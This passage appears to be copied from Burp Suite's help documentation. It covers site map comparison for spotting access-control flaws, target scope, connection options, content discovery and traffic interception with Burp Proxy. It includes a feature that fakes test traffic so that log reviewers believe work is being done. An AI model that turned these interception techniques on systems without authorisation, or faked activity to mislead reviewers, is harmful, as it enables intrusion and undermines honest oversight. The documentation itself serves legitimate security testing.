You can choose to display only requests with parameters, or which are within the
current target scope. You can filter by MIME type, HTTP status code and file extension.
If you set a filter to hide some items, these are not deleted, only hidden, and will
reappear if you unset the relevant filter. This means you can use the filter to help you
systematically examine a complex site map to understand where different kinds of
interesting content reside.
[Pro version] You can also specify a search term to filter on, which will only show items
containing that expression in the request or response, or within the user-added
comment if applicable.
In addition to filtering content from view, you may sometimes want to delete it
altogether. For example, if you have browsed to off-target domains, you will have
accumulated data within Burp that you just don't need. In this situation, you can
permanently delete the superfluous items using the context menus within the site map.
For example, you can select multiple hosts or folders within the tree or table views and
delete them altogether:
Comparing site maps

You can use Burp to compare two site maps and highlight differences. This feature can
be used in various ways to help find different types of access control vulnerabilities, and
identify which areas of a large application warrant close manual inspection. Some
typical use-cases for this functionality are as follows:
You can map the application using accounts with different privilege levels, and
compare the results to identify functionality that is visible to one user but not the other.
You can map the application using a high-privileged account, and then re-request
the entire site map using a low-privileged account, to identify whether access to
privileged functions is properly controlled.
You can map the application using two different accounts of the same type, to
identify cases where user-specific identifiers are used to access sensitive resources, and
determine whether per-user data is properly segregated.
You can access the "compare site maps" feature using the context menu on the main
site map. This opens a wizard that lets you configure the details of the site maps you
want to compare, and how the comparison should be done. When selecting the site
maps you want to compare, the following options are available:
The current site map that appears in Burp's target tab.
A site map loaded from a Burp state file that you saved earlier.
Either of the above, re-requested in a different session context.
You can choose to include all of the site map's contents, or you can restrict only to
selected or in-scope items. If you choose to re-request a site map in a different session
context, it is particularly important not to include requests that might disrupt that
context - for example, login, logout, user impersonation functions, etc.
To perform the comparison, Burp works through each request in the first site map, and
matches this with a request in the second site map, and vice versa. The responses to
matched requests are then compared to identify any differences. Any unmatched items
in either site map are flagged as deleted or added, respectively. The exact process by
which this is done is highly configurable, allowing you to tailor the comparison to
features of the target application.
The options for configuring how Burp matches requests in the two site maps are shown
below:
The default options shown will work well in most situations, and match requests based
on URL file path, HTTP method and the names of parameters in the query string and
message body. For some applications, you will need to modify these options to ensure
that requests are correctly matched. For example, if an application uses the same base
URL for various different actions, and specifies the action using the values of query
string parameters, you will need to match requests on the values of these parameters
as well as their names.
The options for configuring how Burp compares the responses to matched requests are
shown below:
Again, the default options will work in most situations. These options ignore various
common HTTP headers and form fields that have ephemeral values, and also ignore
whitespace-only variations in responses. The default options are designed to reduce the
noise generated by inconsequential variations in responses, allowing you to focus

attention on differences that are more likely to matter.
The results of a simple site map comparison are shown below. This shows an
application that has been mapped out with administrative privileges, and the resulting
site map re-requested with user-level privileges. The results contain a colourised
analysis of the differences between the site maps, and show items that have been
added, deleted or modified between the two maps. (In this case, since the whole of the
first site map was re-requested, there are no added or deleted items in the maps
themselves.) For modified items, the table includes a diff count column, which is the
number of edits required to modify the item in the first map into the item in the second
map. When you select an item, the corresponding item in the other site map is also
selected, and each response is highlighted to show the locations of the differences:
Interpreting the results of the site map comparison requires human intelligence, and an
understanding of the meaning and context of specific application functions. For
example, the screenshot above shows the responses that are returned to each user
when they view their home page. The two responses show a different description of the
logged-in user, and the administrative user has an additional menu item. These
differences are to be expected, and they are neutral as to the effectiveness of the
applications access controls, since they only concern the user interface.
The screenshot below shows the response returned when each user requests the toplevel admin page. Here, the administrative user sees a menu of available options, while
the ordinary user sees a not authorised message. These differences indicate that
access controls are being correctly applied:
The screenshot below shows the response returned when each user requests the list
users admin function. Here, the responses are identical, indicating that the application
is vulnerable, since the ordinary user should not have access to this function and does
not have any link to it in their user interface:
As this example shows, simply exploring the site map tree and looking at the number of
differences between items is not sufficient to evaluate the effectiveness of an
applications access controls. Two identical responses may indicate a vulnerability (for
example, in an administrative function that discloses sensitive information), or may be
harmless (for example, in an unprotected search function). Conversely, two different
responses may still mean that a vulnerability exists (for example, in an administrative
function that returns different content each time it is accessed), or may be harmless
(for example, in a page showing profile information about the currently logged-in user).
All of these scenarios may coexist even in the same application. This is why fully
automated tools are so ineffective at identifying access control vulnerabilities.
So Burp does not relieve you of the task of closely examining the application's
functionality, and evaluating whether access controls are being properly applied in each
case. What the site map comparison feature does is to automate as much of the
process as possible, giving you all the information you need in a clear form, and letting
you apply your knowledge of the applications functionality to identify any actual
vulnerabilities.
Target scope
The "scope" tab lets you tell Burp, at a Suite-wide level, exactly what hosts and URLs
constitute the target for your current work. You can think of the target scope as,
roughly, the items which you are currently interested in and willing to attack.
The target scope can affect the behaviour of the individual Burp tools in numerous
ways, for example:
You can set display filters to show only in-scope items.
You can tell the Proxy to intercept only in-scope requests and responses.
The Spider will only follow links that are in scope.
In Burp Suite Professional, you can automatically initiate vulnerability scans of

in-scope items.
You can configure Intruder and Repeater to follow redirects to any in-scope
URLs.
By telling Burp what your current target is, you can ensure that Burp carries out
numerous such actions in an appropriate way, only going after items that you are
interested in and willing to attack. In all cases, you can additionally fine tune the target
scope and the associated behaviour at the level of individual tools, giving you finegrained control over everything that Burp does, if you need it. However, the Suite-wide
scope definition provides a quick and easy way to tell Burp what is fair game and what
is off limits, and is almost always worth configuring before you begin your work in
earnest.
The configuration of target scope is very powerful, but also very easy. The UI in the
"scope" tab lets you define rules for what is included within, or excluded from, the
target scope. For each rule, you can define the following fields:
Protocol - HTTP, HTTPS, or either.
Host - this can be either a regular expression to match the hostname, or an IP

range in various standard formats, for example 10.1.1.1/24 or 10.1.1-20.1-127. If the
host field is left blank, then the rule can match requests to any host.
Port - this is a regular expression to match the port number. If the port field is
left blank, then the rule can match requests to any port.
File - this is a regular expression to match the file portion of the URL. If the file
field is left blank, then the rule can match requests for any file.
When Burp evaluates a URL to decide if it is within the target scope, it will be deemed
to be in scope if the URL matches at least one "include" rule and does not match any
"exclude" rules. This enables you to define specific hosts and directories as being
generally within scope, and yet exclude from that scope specific subdirectories or files.
For example, the target scope defined below will match any content within
https://www.myapp.com and https://staging.myapp.com with the exception of content
below https://www.myapp.com/admin and any URL containing the expression "logout":
Configuring scope rules directly as described above is somewhat unfriendly for many
users. A much easier approach is to let Burp define the rules for you based on intuitive
instructions which you give it using the context menus in the site map or elsewhere.
Before you begin testing the application, you simply need to browse to the relevant
content so that it appears in the site map. You can then select one or more hosts and
folders, and use the context menu to include or exclude these from the scope. This
process is extremely easy and in most situations will let you quickly define all of the
rules necessary for your testing:
Suite options
The options tab contains Suite-wide settings which are not specific to any individual
tools. These are divided into several sub-tabs containing different areas of settings.
Connections tab
This tab contains options controllling how Burp handles network connections, including
authentication, proxy servers, redirections, timeouts and hostname resolution.
These settings control whether Burp Suite should perform authentication to destination
web servers. Different authentication types and credentials can be configured for
individual hosts. Supported types are: basic, NTLMv1, NTLMv2 and digest
authentication. The domain and hostname fields are only used for NTLM authentication.
The "prompt for credentials" option causes an interactive popup to appear whenever an
authentication failure is encountered.
These settings allow you to configure rules specifying different proxy settings for
different (ranges of) destination hosts.
The configuration shown above will make Burp talk directly to
staging.intranet.corp.com, use an internal proxy server without authentication for
everything else on *.intranet.corp.com, and use an authenticated gateway web proxy
for everything else, including the public internet.
You can use standard wildcards in the destination host specification. Rules are applied
in sequence, and the first rule which matches the web server you are communicating
with will be used. If no rule is matched, Burp defaults to direct, non-proxy connections.
For each upstream proxy you configure, you can specify an authentication type and
credentials if required. Supported types are: basic, NTLMv1, NTLMv2 and digest
authentication. The domain and hostname fields are only used for NTLM authentication.
These options let you configure Burp to use a SOCKS proxy for all outgoing
communications.
These settings control what types of redirection Burp will recognise and attempt to
follow where applicable. The redirection targets which Burp will actually follow are still
determined by the configuration within each individual tool (e.g. based on target
scope).
These settings determine timeouts for various network tasks. The "normal" setting is
used for most network communications, and determines how long Burp Suite will wait
before abandoning an individual request and record that a timeout has occurred. The
"read until close" setting is only used where a response is being processed which does
not contain a Content-Length or Transfer-Encoding HTTP header. In this situation, Burp
Suite waits for the specified interval before determining that the transmission has been
completed. The "domain name resolution" setting determines how often Burp Suite will
re-perform successful domain name look-ups. This should be set to a suitably low value
if target host addresses are frequently changing. The "failed domain name resolution"
setting determines how often Burp Suite will reattempt unsuccessful domain name lookups.
These settings enable you to specify hostname-to-IP mappings which override the DNS
resolution provided by the operating system. This feature can be used to ensure correct
onward forwarding of requests when the hosts file has been modified to perform
invisible proxying of traffic from non-proxy-aware thick client components.
These options control the handling of HTTP 100 Continue responses from servers. These
often occur when a POST request is sent to the server, and it makes an interim
response before the request body has been transmitted. If "understand 100 Continue
responses" is checked, Burp Suite will skip the interim response and parse the real
response headers for response information like status code and content type. If
"remove 100 Continue headers" is checked, Burp Suite will remove any interim headers
from the server's response before this is passed to individual tools.
Sessions tab
This tab allows you to configure Burp's session handling and macro capabilities. For
more information about making use of these feature, see the session handling help.
Display tab
This tab contains options controlling how Burp displays HTTP requests and responses.
These settings control the font which is used to display HTTP messages, and whether
syntax highlighting is performed for requests and responses.
These settings control how Burp handles character sets when displaying HTTP requests
and responses. By default, charsets are automatically recognised and correctly
rendered, per response. This avoids the need to set a specific charset on the command
line when starting Burp, and allows you to work with content that uses multiple
different charsets within the same instance of Burp.
You can override this default behaviour and set a specific charset, or tell Burp to display
raw bytes with no charset handling, in the above options.
Note that some charsets are not supported for all fonts. If you are using a charset that
employs non-Latin glyphs, you should first try using a system font such as Courier New
or Dialog.
Any location where HTTP responses are displayed within Burp Suite it is possible to
render HTML content as it would appear within your browser. This option controls
whether Burp Suite will make any additional HTTP requests that are required to fully
render HTML content (for example, for embedded images). Use of this option involves a
trade-off between the speed and the quality of HTML rendering performed by Burp
Suite.
SSL tab
This tab contains options for how SSL should be used, and information about the SSL
certificates presented by destination servers.
This option enables you to configure a client SSL certificate (in PKCS12 format) which
will be used whenever a destination HTTPS server requires client certificate
authentication. You can also configure Burp to allow unsafe renegotiation, which is
apparently necessary when using some client certificates.
Sometimes, you may have difficulty negotiating SSL connections with certain web
servers. The Java SSL stack contains a few gremlins, and fails to work with certain
unusual server configurations. To help you troubleshoot this problem, Burp lets you
specify which protocols should be offered to servers during SSL negotiations.
Note that Burp itself implements a few workarounds for SSL issues, and if a negotiation
fails with the protocols you have configured, Burp will still try some alternative
combinations of protocols which often work. So you shouldn't use this feature as a
method of testing which protocols are actually supported by the server.
You can also configure Burp to enable all supported cipher suites during SSL
negotiation. This option is not normally necessary but may be useful when attempting
to connect to unusually configured SSL stacks.
This information-only panel contains details of all X509 certificates received from
destination web servers. Double-click an item in the table to display the full details of
the certificate.
Misc tab
This tab contains miscellaneous settings regarding logging, backup, location of
temporary files, and scheduled tasks.
These settings control logging of network requests and responses. Logging can be
configured per-tool or for all Burp Suite traffic.
[Pro version] These settings let you configure Burp to save a backup of all tools' state
and configuration in the background at a configurable interval, and also optionally on
exit. This setting persists across reloads of Burp. So you can configure Burp to always
save its state to a local temp directory, and know that every time you use Burp you will
have a backup copy of your work.
These options let you configure the directory path where Burp saves its temporary files.
This allows you to specify a directory on a different volume, or which is not worldreadable, if required. Changes to this setting take effect the next time Burp starts up.
[Pro version] You can use the task scheduler to automatically start and stop certain
tasks at defined times and intervals. For example, the configuration shown above will
begin scanning a target overnight at 2am, and suspend the scanner each day during
working hours.
You can create tasks via the context menus which appear throughout Burp, or using the
"new task" button in the above panel. This action starts a wizard which lets you
configure the details and timing of the task. Various different types of task are
available:
You can configure each task to be one-off, or to repeat at regular intervals.
Engagement tools
[Pro version] A number of tools exist to help make your work faster and more effective.
These can be accessed via the context menus which appear throughout Burp:
Search
See search help.
Note that if you initiate a search from within the target site map (as opposed to the
Burp menu), then the search will be specific to the selected branch(es) of the site map.
Find comments and scripts

You can use these functions to search part or all of the site map for scripts and
comments. The search results window shows responses from all Burp tools containing
either scripts or comments. Selecting an individual item shows the full request and
response in a preview pane, with relevant items automatically highlighted, and also
extracted into their own tab:
You can use the "export" button to save all of the scripts or comments to file or to the
clipboard, optionally consolidating duplicated items.
Find references
Anywhere you see an HTTP request, URL, domain, etc., you can use the "find
references" function to search all of Burp's tools for HTTP responses which link to that
item. The search results window shows responses from all Burp tools which link to the
selected item. When you view an individual search result, the response is automatically
highlighted to show where the linking reference occurs:
Note that this feature treats the original URL as a prefix when searching for links, so if
you select a host, you will find all references to that host; if you select a folder, you will
find all references to items within that folder or deeper.
The new "find references" feature effectively serves the same purpose as the "linked
from" list that existed in earlier versions of Burp Spider, but is much more powerful.
Analyse target
This function can be used to analyse a target web application and tell you how many
static and dynamic URLs it contains, and how many parameters each URL takes. This
can help you assess how much effort a penetration testing engagement is likely to
involve, and can help you decide where to focus your attention during the test itself.
To access this feature, select one or more hosts or branches within the site map, and
launch it using the context menu. The summarised information looks like this:
And you can drill down into more detail about individual URLs:
You can also export all of this information as an HTML report, which you can attach to
client proposals and reports to show the attack surface you have covered.
Note: (i) This function only analyses the content already captured within the site map,
so you should ensure that you have fully browsed or spidered all of the application's
content and functionality before running it. (ii) URLs are deemed to be "static" if they
no not take any parameters in the URL or message body; however the responses from
these URLs may still be dynamically generated by the application.
Discover content
You can use this function to discover content and functionality which is not linked from
visible content which you can browse to or spider.
Burp uses various techniques to discover content, including name guessing, web
spidering, and extrapolation from naming conventions observed in use within the
application. The feature is highly configurable, as shown by the available options which
are explained below:
Target - These options control which directory to begin discovery from. Only items
within this path and its subdirectories will be requested during the session. You can
choose to discover files or directories or both, and how deep to recurse into discovered
subdirectories.
Test case generation - These options control which file and directory names Burp will
use when making requests to discover content. As well as built-in lists, Burp can
harvest names used elsewhere within an application, and retry them at other locations,
and can construct names based on discovered items, for example by cycling values in
filenames containing numbers.
File extensions - You can specify a list of file extensions with which to test each
possible filename. Burp can harvest file extensions observed in use within the
application, and test these with every filename. When a file has been confirmed, Burp
can also try a specific list of variant extensions with that filename, for example to check
for old or backup versions of the same file.
Discovery engine - You can control how many threads are used for content discovery
and spidering, whether file names are handled case sensitively, and how the discovery
session interacts with Burp's main site map (in the target tab of the suite).
When you have configured your discovery session, you can start it from the control tab,
which also provides runtime information about the actions being performed. The work is
divided into numerous discrete tasks, which are prioritised according to their likelihood
of quickly discovering new content, and new tasks are generated recursively as content
is confirmed:
The discovery session employs its own site map, showing all of the content which has
been discovered within the defined scope. If you have configured Burp to do so, newly
discovered items will also be added to Burp's main site map.
Schedule task
See task scheduler help.
Simulate manual testing

This feature won't exactly enhance your productivity, but you may sometimes find it
useful nonetheless. You can use it to make Burp simulate manual testing activities, by
sending common test payloads to random URLs and parameters within a target
application, at irregular intervals. Burp doesn't do anything with the responses, so you
won't find out about any bugs in this way. But if you think that someone might be
reviewing the application's logs to confirm that you are working, you can use this
feature while you nip out for a long lunch, gym session, drinking binge, or whatever
happens to be your preferred diversion.
Easter Eggs, anyone?
Message editor
Throughout Burp, a custom text editor is used which is optimised for viewing and
editing HTTP requests and responses. Request and response syntax is automatically
colourised to highlight interesting items. Mouse-over pop-ups perform automatic URL
decoding (for requests) and HTML decoding (for responses).
The following shortcut keys are available:
Ctrl + A, select all
Ctrl + X, cut selected text
Ctrl + C, copy selected text
Ctrl + V, paste
Ctrl + F, find and highlight the selected text throughout the message
Ctrl + Z, undo last edit
Ctrl + Y, redo last undone edit
Ctrl + U, URL-encode selected text (hold down Shift to decode)
Ctrl + H, HTML-encode selected text (hold down Shift to decode)
Ctrl + B, Base64-encode selected text (hold down Shift to decode)
Ctrl + left, move to previous word
Ctrl + right, move to next word
Ctrl + up, move to previous paragraph
Ctrl + down, move to next paragraph
Ctrl + home, go to start of message
Ctrl + end, go to end of message
Ctrl + backspace, delete previous word
Ctrl + del, delete next word

Right-clicking on any request or response produces a context menu that can be used to
perform various actions:
send to - You can send any message, or a selected portion of the message, to
other tools within Burp Suite, to perform further attacks or analysis.
show response in browser - You can use this to render the selected response
in your browser, to avoid the limitations of Burp's built-in HTML renderer. When you
select this option, Burp gives you a unique URL which you can paste into your browser
(configured to use the current instance of Burp as its proxy), to render the response.
The resulting browser request is served by Burp with the exact response that you
selected (the request is not forwarded to the original web server), and yet the response
is processed by the browser in the context of the originally requested URL. Hence,
relative links within the response will be handled properly by your browser. As a result,
your browser may make additional requests (for images, CSS, etc.) in the course of
rendering the response - these will be handled by Burp in the usual way.
request in browser - You can use this to re-issue the selected request in your
browser (configured to use the current instance of Burp as its proxy), and optionally reissue the request within the current browser session (i.e. using the cookies supplied by
the browser's cookie JAR). You can use this feature to facilitate testing of access
controls, by selecting requests within Burp that were generated within one user context
(e.g. an administrator), and reissuing the requests within a different user context that
you are now logged in as (e.g. an ordinary user). When you are dealing with complex,
multi-stage processes, this methodology, of manually pasting a series of URLs from
Burp into your browser, is normally a lot easier than repeating a multi-stage process
over and over, and modifying cookies manually using the proxy.
find references - [Pro version] You can use this function to search all of Burp's
tools for HTTP responses which link to the selected item.
discover content - [Pro version] You can use this function to discover content
and functionality which is not linked from visible content which you can browse to or
spider.
schedule task - [Pro version] You can use this function to create tasks which
will run automatically at defined times and intervals.
change request method - For requests, you can automatically switch the
request method between GET and POST, with all relevant request parameters suitably
relocated within the request. This option can be used to quickly test the application's
tolerance of parameter location in potentially malicious requests (e.g. cross-site
scripting).
change body encoding - For requests, you can switch the encoding of any
message body between application/x-www-form-urlencoded and multipart/form-data.
copy URL - This function copies the full current URL to the clipboard.
copy to file - This function allows you to select a file and copy the contents of
the message to the file. This is handy for binary content, when copying via the
clipboard may cause problems. Copying operates on the selected text or, if nothing is
selected, the whole message.
paste from file - This function allows you to select a file and paste the contents
of the file into the message. This is handy for binary content, when pasting via the
clipboard may cause problems. Pasting replaces the selected text or, if nothing is
selected, inserts at the cursor position.
save item - This function lets you specify a file to save the selected request and
response in XML format, including all relevant metadata such as response length, HTTP
status code and MIME type.
convert selection - These functions enable you to perform quick encoding or

decoding of the selected text in a variety of schemes.
URL-encode as you type - If this option is turned on then characters like & and
= will be automatically replaced with their URL-encoded equivalents as you type.
Extensibility
Burp Suite is extensible via the IBurpExtender interface. This allows third-party
developers to extend the functionality of Burp by creating implementations of the
interface which will be dynamically loaded and executed. Extensions can perform a wide
range of functions, including processing and modifying HTTP requests made via all Burp
tools, issuing arbitrary HTTP requests via Burp, extending Burp's UI with custom menu
items, querying and modifying Burp's configuration data, and accessing key runtime
information, including the Proxy history, site map and Scanner issues. See the source
code and Javadoc for the interface for more details.
I think if you gone through the manual you are ready to hack.But
wait there are so much to offer.
What is Burp Proxy?

Burp Proxy is an interactive HTTP/S proxy server for attacking and debugging web
applications. It operates as a man-in-the-middle between the end browser and the
target web server, and allows the user to intercept, inspect and modify the raw traffic
passing in both directions.
Burp Proxy allows you to find and exploit application vulnerabilities by monitoring and
manipulating critical parameters and other data transmitted by the application. By
modifying browser requests in various malicious ways, Burp Proxy can be used to
perform attacks such as SQL injection, cookie subversion, privilege escalation, session
hijacking, directory traversal and buffer overflows. Intercepted traffic can be modified
as raw text, as a table of parameters or headers, or in hexadecimal form, so even
transfers of binary data can be manipulated. Response messages containing HTML or
image data can be rendered within Burp Proxy.
In addition to per-request manipulation, Burp Proxy maintains a complete history of
every request sent by the browser, all modifications made, and all responses received.
You can review earlier requests, and reissue and re-modify any individual request, and
view saved responses in raw form or rendered as web pages. The entire conversation in
both directions can also be logged to file for further analysis or to provide an audit trail.
Burp Proxy is tightly integrated with the other tools within Burp Suite, and allows any
request or response to be sent to other tools for further processing. With a single click,
you can send an interesting request to be used as the basis for session token analysis,
manual modification and reissue, vulnerability analysis, or a custom automated attack
using Burp Intruder.
The interactive behaviour of Burp Proxy can be controlled using fine-grained rules for
requests and responses, based on domain, IP address, protocol, HTTP method, URL,
resource type, parameters, cookies, header/body content, response code, content type
and HTML page title. It can be configured to operate quietly without any per-request
interaction. You can later review the history to identify requests that bear closer
examination. Burp Proxy can be used to automate modification of HTTP request and
response messages, through the use of regex-based match and replace rules.
In addition to the main user interface, Burp Proxy can also be controlled from within the
end browser, for reviewing the request history and reissuing individual requests.
Burp Proxy can be used in conjunction with a upstream proxy server. It can handle
basic, NTLM and digest authentication to the upstream proxy and to web servers, and
so can be used in almost any LAN environment. It supports SSL (with the ability to
configure custom server or client certificates), and allows HTTPS traffic to be viewed
and modified as clear-text. In addition, it automatically handles various encodings of
server responses, including chunked transfer-encoding and compressed contentencoding.
Using Burp Proxy

When Burp Proxy is launched, the HTTP/S proxy service is started automatically on port
8080 of the loopback interface only. To start using Burp Proxy, simply configure your
browser to use a proxy server on 127.0.0.1:8080, and begin browsing.
By default, Burp Proxy is configured to intercept requests for non-media resources, and
display these for inspection and modification. Other requests (for images and
stylesheets) and all server responses are automatically forwarded. This default
behaviour can be modified (seeOptions tab).
Intercept tab
This tab is used to display and modify individual browser requests and server
responses.
The top of the display indicates whether the HTTP message shown is a request or
response, and the hostname and IP address of the target server. When you have
reviewed and (if required) edited the message, click "forward" to send it on to the
server or browser. Click "drop" to abandon the message.
You can also forward or drop the message using the shortcut keys Alt-F and Alt-D.
Each request and response message can be displayed and analysed in various forms, by
clicking on one of the available display tabs. The available tabs will appear and
disappear as appropriate for the type of message being displayed:
raw - This displays the message in plain text form. At the bottom of the text
pane is a search and highlight function which can be used to quickly locate interesting
strings within the message, such as error messages. An options pop-up on the left of
the search bar lets you control case sensitivity, and whether to use simple text or regex
search.
params - For requests containing parameters (within the URL query string, the
Cookie header, or the message body), this tab analyses the parameters into
name/value pairs and allows these to be easily viewed and modified.
headers - This shows the HTTP headers of the message as name/value pairs,
and also displays any message body in raw form.
hex - This allows direct editing of the raw binary data that make up the
message. Certain types of traffic (e.g. browser requests with MIME-encoded parts)
contain binary content that may be corrupted if modified in the text editor. To modify
this type of message, the hex editor should be used.
HTML / XML - For responses containing content in these formats, this provides
a syntax-colourised view of the message body.
render - For responses containing HTML or image content, this renders the
content in visual form, as it would appear within your browser.
AMF - For requests and responses in Action Message Format, this displays a tree
view of the decoded message. If editable, you can double-click individual nodes in the
tree to modify their values.
viewstate - For requests and responses containing an ASP.NET ViewState

parameter, this deserialises the contents of the ViewState, enabling you to review the
data contained for any sensitive items. It also indicates whether the ViewState MAC
option is enabled (and therefore whether the ViewState can be modified).
Right-clicking on any of the display tabs produces a context menu that can be used to
perform various actions. The same menu can also be accessed via the "action" button
on the main display:
find references - [Pro version] You can use this function to search all of Burp's
tools for HTTP responses which link to the selected item.
discover content - [Pro version] You can use this function to discover content
and functionality which is not linked from visible content which you can browse to or
spider.
scripting).
don't intercept - These commands allow the quick addition of interception rules
(see Options tab) to prevent interception of messages which share features of the
currently displayed message (e.g. remote host, resource type, response code).
do intercept - Available for requests only, this allows you to force interception
for the response to the currently displayed request.

The intercept tab contains a toggle button which can be used to quickly turn
interception mode on and off. If this is showing "intercept is on" then messages will be
intercepted or automatically forwarded according to the interception rules configured on
the Options tab. If this is showing "intercept is off" then no messages will be
intercepted.
Options tab
This tab contains various configuration options which control the behaviour of Burp
Proxy, as described below.
Burp Proxy allows you to define multiple listeners. Each listener opens a port on your
computer and waits for connections from your browser. By default, Burp opens a single
listener on port 8080 of the loopback interface, but you can modify this listener and add
as many others as you require. For each listener, you can configure a number of
properties, as described below.
local listener port - This is the port on the local computer which will be opened to
listen for incoming connections. You should configure your browser settings to use the
host 127.0.0.1 and this port as its proxy server.
listen on loopback interface only - This controls whether the listener binds only to
the loopback interface (127.0.0.1) or to all network interfaces. Note: if this option is
deselected then other computers may be able to connect to the listener. This may
enable them to initiate outbound connections originating from your IP address, and to
access the contents of the proxy history, which may contain sensitive data such as login
credentials. You should only deselect this option when you are located on a trusted
network.
support invisible proxying for non-proxy-aware clients - If you are using a
standard browser, you should leave this option unchecked. The option is sometimes
useful if the application you are targeting employs a thick client component which runs
outside of the browser, or which makes its own HTTP requests outside of the browser's
framework. Often, these clients don't support HTTP proxies, or don't provide an easy
way to configure them to use one. In this situation, you can effectively force the client
to connect to Burp by redirecting the client's requests lower down the networking stack
- e.g. by adding an entry to your hosts file, or changing your routing configuration.
However, the requests issued by the client will probably not be in the style normally
used with web proxies.
A proxy-style request looks like this:
GET http://myapp.com/foo.php HTTP/1.1
Host: myapp.com
whereas the corresponding non-proxy request looks like this:
GET /foo.php HTTP/1.1
Host: myapp.com
Normally, web proxies need to receive the full URL in the first line of the request in
order to determine which destination host to forward the request to (they do not, if
they follow the spec, look at the Host header to determine the destination). To enable
Burp Proxy to work with clients that send non-proxy-style requests, you need to check
the "support invisible proxying" option. When you do this, if Burp receives any nonproxy-style requests, it will by parse out the contents of the Host header, and use that
as the destination host for that request.
redirect to host/port - You should normally leave these options blank. If they are
configured, Burp Proxy will forward every request to the host and port specified,
regardless of the target requested by the browser. Note that if you are using this
option, it may be necessary to configure a match/replace rule to rewrite the Host
header in requests, if the server to which you are redirecting requests expects a Host
header that differs from the one sent by the browser.
server SSL certificate - This option lets you configure the server SSL certificates that
are presented to your browser. Correct use of these options can resolve some SSL
issues that arise when using an intercepting proxy. See the server SSL certificates
help for full details of how to use these options.
Note: By default, upon installation, Burp creates a unique, self-signed CA certificate,
and stores this on your computer to use every time Burp is run. Each time you connect
to an SSL-protected website, Burp generates a server certificate for that host, signed by
the CA certificate. To make most effective use of this feature, you can install Burp's CA
certificate as a trusted root in your browser (see instructions), so that the per-host
certificates are accepted without any alerts.
Sometimes, you may wish to create a custom SSL certificate to use within Burp. You
can use the following commands in OpenSSL to create a custom certificate (called
"foo.crt") with a name of your choosing:
openssl genrsa 1024 > foo.key
openssl req -new -x509 -nodes -sha1 -days 7300 -key foo.key > foo.crt
openssl pkcs12 -export -out foo.p12 -in foo.crt -inkey foo.key -name "your
name"
These panels allow fine grained interception rules to be configured governing the
interception of requests and responses. The "intercept if" checkboxes control whether
any requests and responses at all are intercepted. If one or both of these boxes are
checked, then the relevant messages will be intercepted according to the active rules in
the table. Individual rules can be activated or deactivated with the checkbox on the left
of each rule. Rules can be edited, removed, added or relocated using the buttons on the
right.
Rules can be configured on practically any attribute of the message, including domain
name, IP address, protocol, HTTP method, URL, resource type, parameters, cookies,
header/body content, response code, content type and HTML page title. You can
configure rules to only intercept items for URLs that are within the target scope.
Regular expressions can be used to define complex matching conditions for each
attribute. Rules are combined using the Boolean operators AND and OR. These are
processed with a simple "left to right" logic in which the scope of each operator is as
follows:
(cumulative result of all prior rules) AND/OR (result of current rule)
All active rules are processed on every message, and the result after the final active
rule is applied determines whether the message is intercepted or forwarded in the
background.
The "update Content-Length" checkboxes control whether Burp Proxy automatically
updates the Content-Length header of requests and responses when these have been
modified by the user. If checked, Burp Proxy will recalculate the length of the HTTP
body of the modified message, and set the correct value in the HTTP header. This
feature is normally essential when the HTTP body has been modified. The HTTP
specification, and most web servers, require the correct value for the length of the HTTP
body to be submitted in the Content-Length header. If the correct value is not specified,
then the server or browser receiving the message may generate an error, process an
incomplete message, or may wait indefinitely for further data to be received.
You can use these options to achieve various tasks by automatically rewriting the HTML
in application responses. Unhiding hidden fields enables you to edit their values directly
in the browser, rather than by intercepting subsequent requests. Similarly with enabling
disabled fields, and removing length limitations. Disabling JavaScript and OBJECT tags
provides a quick way to disable any client-side logic for testing purposes. (Note that this
feature is not designed to be used as a security defence in the manner of NoScript.)
match and replace - These options configure Burp Proxy to perform regex-based
pattern matching and replacement on HTTP request and response headers and body.
For each rule selected, a regular expression is used to test the header or body for
matches, and any matching parts are replaced with the specified string.
For message headers, if the test matches the entire header and the replacement string
is left blank, then the header is deleted. If a blank matching expression is specified,
then the replacement string will be added as a new header. This feature is useful to
automate certain application attacks, such as manipulation of cookies or URL query
string fields.
talk HTTP/1.0 to server - This controls whether Burp Proxy enforces HTTP version
1.0 communications with the target server. The default setting is to use whichever
version of HTTP is used by the browser. Burp Proxy has been tested successfully with
most common web servers using both versions 1.0 and 1.1. However some legacy
servers or applications may require version 1.0 in order to function correctly, and so
this can be specified here.
unpack gzip / deflate - Some browsers accept gzip- and deflate-compressed content
from servers. In order to view or modify this content, it needs to be unpacked into
uncompressed form. This option controls whether Burp Proxy performs this unpacking
automatically.
History tab
This tab displays details of all requests made, and shows the target server and port
number, the HTTP method, the URL, whether the request contains parameters or was
manually modified, the HTTP status code of the response, the response size in bytes,
the MIME type of the response, the file type of the requested resource, the title of the
HTML page, whether SSL was used, the remote IP address, any cookies set by the
server, and the time of the request. This tab is useful when you have interception
turned off, as it allows you to browse without interruption whilst still monitoring key
details about application traffic.
You can click on any column heading in the history table to sort the table according to
the contents of that column (or shift-click the column to reverse-sort). For example, if
you prefer your history table to grow "upwards", with the most recent items at the top
of the table, then you can shift-click the leftmost column showing the request number.
Alternatively, if you want to group all of the requested items according the their content
type, you can click the "MIME type" column.
Below the history table is a preview pane. If you select an item from the history, the
relevant request and response (if received) will be displayed in the lower pane. If the
request or response was modified, either manually or through any rules that you have
configured, then the modified items will also be shown alongside the originals.
Right-clicking on one or more items in the history table will show a context menu
enabling you to perform various actions, including modifying the target scope, sending
the items to other Burp tools, or deleting the items from the history:
[Pro version] You can use the context menu to access various engagement tools, such
as searching for comments and scripts, analysing your target web site, scheduling
tasks, etc.
You can annotate individual or multiple items, by adding comments and highlights:
column:
cell:
Alternatively, if you want to annotate several items at once, you select the relevant
items and use the context menu to add comments or apply highlights:
In addition to viewing request details in the preview pane, you can also double-click on
any item in the table to show the request and response in a pop-up window:
The content displayed within the history table is effectively a view into an underlying
database, and you can configure filters to determine which items of underlying data are
displayed within the table. Some applications contain a large amount of content like
images, CSS, etc., which it is normally helpful to hide from view. AJAX applications
often generate large numbers of very similar asynchronous requests which you may
want to filter from view to see the more interesting items. At the top of the history
table, there is a filter bar. Clicking on this shows a popup enabling you to configure
exactly what content will be displayed within the table:
You can choose to display only requests with parameters, or which are within the
current target scope, or for which a response has been received. You can filter by MIME
type, HTTP status code and file extension. If you set a filter to hide some items, these
are not deleted, only hidden, and will reappear if you unset the relevant filter.
[Pro version] You can also specify a search term to filter on, which will only show items
containing that expression in the request or response, or within the user-added
comment if applicable.
As well as filtering, you can also permanently delete items from the history, by selecting
one or more items in the history table, and choosing "delete" from the context menu.
